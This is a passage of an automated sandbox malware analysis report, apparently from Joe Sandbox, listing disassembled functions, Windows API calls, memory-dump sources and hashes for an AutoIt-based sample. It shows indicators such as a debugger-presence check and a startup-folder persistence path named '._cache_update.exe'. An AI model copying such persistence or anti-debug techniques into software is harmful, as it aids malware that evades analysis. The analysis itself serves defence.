                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: CALL
                                                                                                                                                                  • API String ID: 0-4196123274
                                                                                                                                                                  • Opcode ID: eb9b6dd3ac85d5fd13bca733140a53b91aa7ae8532c82fc42cb9dd49b9f9378e
                                                                                                                                                                  • Instruction ID: 090e4e21ccc90b2b011cbea6922d2bf61d73e8d5933f09129aac23e8569ef46c
                                                                                                                                                                  • Opcode Fuzzy Hash: eb9b6dd3ac85d5fd13bca733140a53b91aa7ae8532c82fc42cb9dd49b9f9378e
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A229C74508345DFD729DF24C490A3ABBE1BF88304F15896DEA9A8B262D771EC85CF42
                                                                                                                                                                  Function 001E4010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID: EA06
                                                                                                                                                                  • API String ID: 4104443479-3962188686
                                                                                                                                                                  • Opcode ID: 31e661113236fdf24d4e5e7a99889360434098449e75255f7b0d200a290143f3
                                                                                                                                                                  • Instruction ID: f3f4b570cf758e85eedc5c177cf9b8fef17605577a1d09f4eb93cf55ca3ca2ba
                                                                                                                                                                  • Opcode Fuzzy Hash: 31e661113236fdf24d4e5e7a99889360434098449e75255f7b0d200a290143f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A417D31A04AD49BDF199F668C617FE7FA18F25300F294475FA82DB183C721AD8487A1
                                                                                                                                                                  Function 0023013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscmp
                                                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                                                  • API String ID: 856254489-3771769585
                                                                                                                                                                  • Opcode ID: e91eea3000acbf23d358b9efc8ae92b45e980be3ac0a9fdbaa0d67f17fac757a
                                                                                                                                                                  • Instruction ID: b1cbad2e5ad465763aff0f5ab395738907de6733b127e2e7caea1ab0a58ba244
                                                                                                                                                                  • Opcode Fuzzy Hash: e91eea3000acbf23d358b9efc8ae92b45e980be3ac0a9fdbaa0d67f17fac757a
                                                                                                                                                                  • Instruction Fuzzy Hash: F4110175220205DBCB04EF55C9D1E6DB3A9AF94710F008099F94DAF391DA70ED518BA0
                                                                                                                                                                  Function 001E3BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00253CF1
                                                                                                                                                                    • Part of subcall function 001E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001E31DA
                                                                                                                                                                    • Part of subcall function 001E3A67: SHGetMalloc.SHELL32(001E3C31), ref: 001E3A7D
                                                                                                                                                                    • Part of subcall function 001E3A67: SHGetDesktopFolder.SHELL32(?), ref: 001E3A8F
                                                                                                                                                                    • Part of subcall function 001E3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 001E3AD2
                                                                                                                                                                    • Part of subcall function 001E3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,002A22E8,?), ref: 001E3B65
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                                                                  • String ID: X
                                                                                                                                                                  • API String ID: 2727075218-3081909835
                                                                                                                                                                  • Opcode ID: 37281cf4312dca0a217542986e36c34f70fa8375a74b9456288984e717d8e231
                                                                                                                                                                  • Instruction ID: 2d2129248b7e6d9b0a16fb99388013479320d3e2b78b727dfb1863d443cd62b9
                                                                                                                                                                  • Opcode Fuzzy Hash: 37281cf4312dca0a217542986e36c34f70fa8375a74b9456288984e717d8e231
                                                                                                                                                                  • Instruction Fuzzy Hash: C311C6B1A106C8ABCF05DFD5D8096EEBBF9AF45704F10800EE411BB241DBB54A598BA5
                                                                                                                                                                  Function 002230AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID: "*
                                                                                                                                                                  • API String ID: 4104443479-2553813866
                                                                                                                                                                  • Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                                                                  • Instruction ID: d8870bb5c40a6b0dfa24d9dc199087293b4d39fd9fe3799a5a4318f9c98c20cd
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                                                                                                                                                                  • Instruction Fuzzy Hash: F101F932210225ABCB14DF2DD891DBB77A9FFC5314714802EF90ACB245D631E912C7D0
                                                                                                                                                                  Function 001E34C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 002534AA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                                  • API String ID: 1029625771-2684727018
                                                                                                                                                                  • Opcode ID: ff0a59059493c930d1f093ef926eb1c2b9a79a51c85bf96574165461923368ba
                                                                                                                                                                  • Instruction ID: 5f150bab4989298de377a59e1073fc938bd37114ab745be2945b81df567a621f
                                                                                                                                                                  • Opcode Fuzzy Hash: ff0a59059493c930d1f093ef926eb1c2b9a79a51c85bf96574165461923368ba
                                                                                                                                                                  • Instruction Fuzzy Hash: F5F0627190524DAE8F15EFB1D8958FFB7B8AE20300B10C526F82693082EB349B19DB31
                                                                                                                                                                  Function 00226852 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00226623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,0022685E,?,?,?,00254A5C,0027E448,00000003,?,?), ref: 002266E2
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,"*,00000000,00000000,?,?,?,00254A5C,0027E448,00000003,?,?,001E4C44,?,?), ref: 0022686C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$PointerWrite
                                                                                                                                                                  • String ID: "*
                                                                                                                                                                  • API String ID: 539440098-2553813866
                                                                                                                                                                  • Opcode ID: 375054826fa2c202eccc280ca7ee9cc2436a5d1cd2a3b49e25fefa2da34bfe7c
                                                                                                                                                                  • Instruction ID: 479fd8bb6e25738f689b43ff2fbd89d3a9431b2402d5e324ee91b6b1ad964d44
                                                                                                                                                                  • Opcode Fuzzy Hash: 375054826fa2c202eccc280ca7ee9cc2436a5d1cd2a3b49e25fefa2da34bfe7c
                                                                                                                                                                  • Instruction Fuzzy Hash: 18E04636400218BBDB20AF94E805A8ABBBCEB04310F00451AF94191050D7F5AA149BA0
                                                                                                                                                                  Function 001FF461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 72465e8c7ccb1b40d77aff9ced7e71ddbbb6b49ace66b4656b823adb0d4ac993
                                                                                                                                                                  • Instruction ID: b4a2bcc7e204e7f96fcc412eeb6c6c171331c0a6b32f939ba5217f03acd5a3b5
                                                                                                                                                                  • Opcode Fuzzy Hash: 72465e8c7ccb1b40d77aff9ced7e71ddbbb6b49ace66b4656b823adb0d4ac993
                                                                                                                                                                  • Instruction Fuzzy Hash: 4751E5312047059FCB14EF64C895BBE73E5AF88324F54856DF95A8B2D2DB70E809CB91
                                                                                                                                                                  Function 00238065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00238074
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0023807A
                                                                                                                                                                    • Part of subcall function 00236B19: GetWindowRect.USER32(?,?), ref: 00236B2C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$CursorForegroundRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1066937146-0
                                                                                                                                                                  • Opcode ID: eecf30442c0b4f3bcc9c378ed5fcfedfcd14298862eaaa20129319b724bdfa36
                                                                                                                                                                  • Instruction ID: e24f33f5c74a0661513cf475a8035e3f261349ef2476c374b784da87ec861628
                                                                                                                                                                  • Opcode Fuzzy Hash: eecf30442c0b4f3bcc9c378ed5fcfedfcd14298862eaaa20129319b724bdfa36
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E3174B5A10208AFDB01EFA4DC81AEEB7B4FF18314F104029F946AB251DB74AE15CB90
                                                                                                                                                                  Function 001EBBD9 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  • Opcode ID: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                                                                                                                                                                  • Instruction ID: 82a5b3f9e68b1a1f19cdb3e00eb421976ebc5b27c5e11f871551bb0e6f041c9d
                                                                                                                                                                  • Opcode Fuzzy Hash: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                                                                                                                                                                  • Instruction Fuzzy Hash: 153184B1604A06EFD714DF69C8D1E6AF3A8FF483207658229E519CB291DF70E865CB90
                                                                                                                                                                  Function 001E1DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 0025DB31
                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 0025DB6B
                                                                                                                                                                    • Part of subcall function 001E1F04: GetForegroundWindow.USER32 ref: 001E1FBE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Foreground
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 62970417-0
                                                                                                                                                                  • Opcode ID: 198684b17a76b016564ede185f6010d4022b1f233bb5c62d97c83afaa1ec4ca3
                                                                                                                                                                  • Instruction ID: 03340a978b151bc19033044865d85d48888ae54080764ffa552677b8719e9e95
                                                                                                                                                                  • Opcode Fuzzy Hash: 198684b17a76b016564ede185f6010d4022b1f233bb5c62d97c83afaa1ec4ca3
                                                                                                                                                                  • Instruction Fuzzy Hash: 80210F72600646BBDB25AF72D880FFE77AE9F80384F014428F91A87181EB70EE058760
                                                                                                                                                                  Function 0021E2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001E1952
                                                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0021E344
                                                                                                                                                                  • _strlen.LIBCMT ref: 0021E34F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Timeout_strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2777139624-0
                                                                                                                                                                  • Opcode ID: 7b1c93afb820ab6d4e764f489c03c1731a207d46a36e3a6303eb2bda96d1a75b
                                                                                                                                                                  • Instruction ID: b6377b4d295c8a4a64f2acffd9b8accf313ef932315bf2e3fccdb5430212afd0
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b1c93afb820ab6d4e764f489c03c1731a207d46a36e3a6303eb2bda96d1a75b
                                                                                                                                                                  • Instruction Fuzzy Hash: A011E33161020567DF04BF69DC86DFEBBE89F64340F004479FA0A9B1D3DF6098968BA0
                                                                                                                                                                  Function 001E3682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • 745EC8D0.UXTHEME ref: 001E36E6
                                                                                                                                                                    • Part of subcall function 00202025: __lock.LIBCMT ref: 0020202B
                                                                                                                                                                    • Part of subcall function 001E32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001E32F6
                                                                                                                                                                    • Part of subcall function 001E32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001E330B
                                                                                                                                                                    • Part of subcall function 001E374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 001E376D
                                                                                                                                                                    • Part of subcall function 001E374E: IsDebuggerPresent.KERNEL32(?,?), ref: 001E377F
                                                                                                                                                                    • Part of subcall function 001E374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,002A1120,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,002A1124,?,?), ref: 001E37EE
                                                                                                                                                                    • Part of subcall function 001E374E: SetCurrentDirectoryW.KERNEL32(?), ref: 001E3860
                                                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 001E3726
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3809921791-0
                                                                                                                                                                  • Opcode ID: 0fc3a7fda8cb310b1966b4753e7a924ded1cc23ae002f427c9d843de8a63ff9c
                                                                                                                                                                  • Instruction ID: 958127cad671d950e5bc2606c1691001bbd4599e4922e9067dfde0ceb167c7ba
                                                                                                                                                                  • Opcode Fuzzy Hash: 0fc3a7fda8cb310b1966b4753e7a924ded1cc23ae002f427c9d843de8a63ff9c
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B119071918345DBC300DF29EC4D95ABBE8FB96750F00451EF994832B1EB709558CF92
                                                                                                                                                                  Function 001E4B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,001E4C2B,?,?,?,?,001EBE63), ref: 001E4BB6
                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,001E4C2B,?,?,?,?,001EBE63), ref: 00254972
                                                                                                                                                                  Memory Dump Source
